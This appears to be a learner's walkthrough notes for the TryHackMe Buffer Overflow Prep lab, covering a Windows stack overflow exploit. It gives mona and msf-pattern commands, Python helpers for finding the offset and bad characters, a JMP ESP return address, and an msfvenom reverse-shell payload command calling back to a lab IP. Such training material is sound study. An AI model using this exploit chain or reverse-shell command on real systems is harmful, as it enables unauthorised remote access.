ez-bof
#https://tryhackme.com/room/bufferoverflowprep
#https://medium.com/swlh/tryhackme-buffer-overflow-prep-9b2ece17a13c
First, set the mona working folder (%p expands to the debugged process name):
!mona config -set workingfolder c:\mona\%p
Then create a cyclic pattern:
msf-pattern_create -l 2400
Put the pattern in the payload and run exploit.py.
If the program crashes, find the offset from the pattern bytes that landed in EIP:
!mona findmsp -distance 2400
This gives the required offset.
Confirm control of EIP by overwriting it with 42424242:
return = "BBBB"
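The two steps above (msf-pattern_create and mona findmsp) rest on one property: every 4-byte window of the cyclic pattern is unique, so the dword that ends up in EIP after the crash maps back to exactly one position in the buffer. The script below is an added example, not part of the original notes or of Metasploit or mona, that rebuilds the pattern with the same upper/lower/digit triplet scheme and looks up the offset from the EIP value the debugger shows; the 0x41336141 test value is constructed for the illustration.

```python
import string

# Character classes used by the Metasploit-style pattern (triplets of upper, lower, digit).
_UPPER = string.ascii_uppercase
_LOWER = string.ascii_lowercase
_DIGIT = string.digits
_MAX_LEN = len(_UPPER) * len(_LOWER) * len(_DIGIT) * 3  # 20280 characters before it repeats


def pattern_create(length: int) -> str:
    """Return the first `length` characters of the cyclic pattern.

    Equivalent of `msf-pattern_create -l <length>`: chunks go Aa0, Aa1, ..., Aa9,
    Ab0, ... so every 4-byte window is unique up to _MAX_LEN characters.
    """
    if length > _MAX_LEN:
        raise ValueError("pattern would repeat beyond %d characters" % _MAX_LEN)
    chunks = []
    total = 0
    for up in _UPPER:
        for lo in _LOWER:
            for dg in _DIGIT:
                chunks.append(up + lo + dg)
                total += 3
                if total >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(eip_value, length: int = 2400):
    """Map the EIP value seen in the debugger back to an offset in the pattern.

    Equivalent of `!mona findmsp` for the EIP register. `eip_value` may be the
    int the debugger displays (e.g. 0x41336141) or the 4-character string itself.
    x86 is little-endian, so the int is converted lowest byte first before the
    search. Returns None when the value is not part of the pattern (for example
    0x42424242, the "BBBB" used to confirm EIP control).
    """
    if isinstance(eip_value, int):
        try:
            needle = eip_value.to_bytes(4, "little").decode("ascii")
        except (OverflowError, UnicodeDecodeError):
            return None
    else:
        needle = eip_value
    idx = pattern_create(length).find(needle)
    return None if idx == -1 else idx


if __name__ == "__main__":
    # Constructed example: the crash left 0x41336141 in EIP, i.e. the bytes "Aa3A".
    print(pattern_create(24))
    print("offset:", pattern_offset(0x41336141, 2400))
```

The offset returned is the number of bytes before the four that overwrite the saved return address, which is the value the padding in exploit.py is built from. If the lookup returns None, the value in EIP did not come from the pattern (the overflow may be shorter than the pattern, or the crash may not be the one expected), and the pattern length or the input path needs another look.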
Next, find bad chars. First generate the byte array to compare against (0x00 is excluded from the start because it terminates C strings):
!mona bytearray -b "\x00"
Generate the same bad-char string with badchars.py, add it to the payload, and run exploit.py. Then compare the bytes that reached memory at ESP with the file mona wrote:
!mona compare -f C:\mona\offsec_pwk_srv\bytearray.bin -a <ESP-address>
Exclude the first byte reported as corrupted, regenerate the array with it added to -b, and repeat until the compare is unmodified.
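What the compare step computes is a walk over the sent byte array against the bytes read back at ESP, stopping at the first byte that did not survive. The script below is an added example, not code from the original notes or from mona, showing that comparison; the observed buffer in the demo is constructed to simulate a target that turns 0x0a into 0x00.

```python
def make_bytearray(exclude: bytes = b"\x00") -> bytes:
    """Equivalent of `!mona bytearray -b "..."`: every byte 0x00-0xff except those in `exclude`."""
    return bytes(b for b in range(256) if b not in exclude)


def find_bad_chars(expected: bytes, observed: bytes) -> list:
    """Return the first byte that did not survive, mirroring `!mona compare`.

    `expected` is the byte array sent in the payload, `observed` is what was read
    back from memory at ESP. The walk stops at the first mismatch because once one
    byte is mangled (or the string is cut short) everything after it is unreliable;
    the caller excludes that byte, regenerates the array and runs another round.
    Returns [] when every byte survived.
    """
    for want, got in zip(expected, observed):
        if want != got:
            return [want]
    if len(observed) < len(expected):
        # Nothing mismatched but the copy stopped early: the next expected byte cut it off.
        return [expected[len(observed)]]
    return []


def format_badchars(bad) -> str:
    """Render a list of byte values as the "\\x00\\x0a" form used with mona and msfvenom -b."""
    return "".join("\\x%02x" % b for b in bad)


if __name__ == "__main__":
    # Constructed round 1: 0x00 already excluded, target turns 0x0a into 0x00.
    sent = make_bytearray(b"\x00")
    observed = bytearray(sent)
    observed[sent.index(0x0a)] = 0x00
    found = find_bad_chars(sent, bytes(observed))
    print("round 1 bad:", format_badchars(found))

    # Constructed round 2: 0x0a excluded as well, everything survives.
    sent = make_bytearray(b"\x00\x0a")
    print("round 2 bad:", find_bad_chars(sent, sent))
```

One byte per round is deliberate: the byte right after a bad char often looks corrupted too only because the first one shifted or truncated the copy, so excluding both at once would discard a byte that is actually fine and shrink the character set the shellcode encoder can use.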
Find a usable return address, a JMP ESP in a module without protections, excluding the bad chars found above:
!mona jmp -r esp -cpb "\x00"
Result, written as the little-endian byte string for the return field:
\x83\x66\x52\x56
Add NOP padding in exploit.py between the return address and the shellcode:
padding = "\x90" * 16
Shell payload (the -b list must contain every bad char found in the compare step, not only \x00):
msfvenom -p windows/shell_reverse_tcp LHOST=10.6.75.240 LPORT=443 EXITFUNC=thread -f c -a x86 -b "\x00"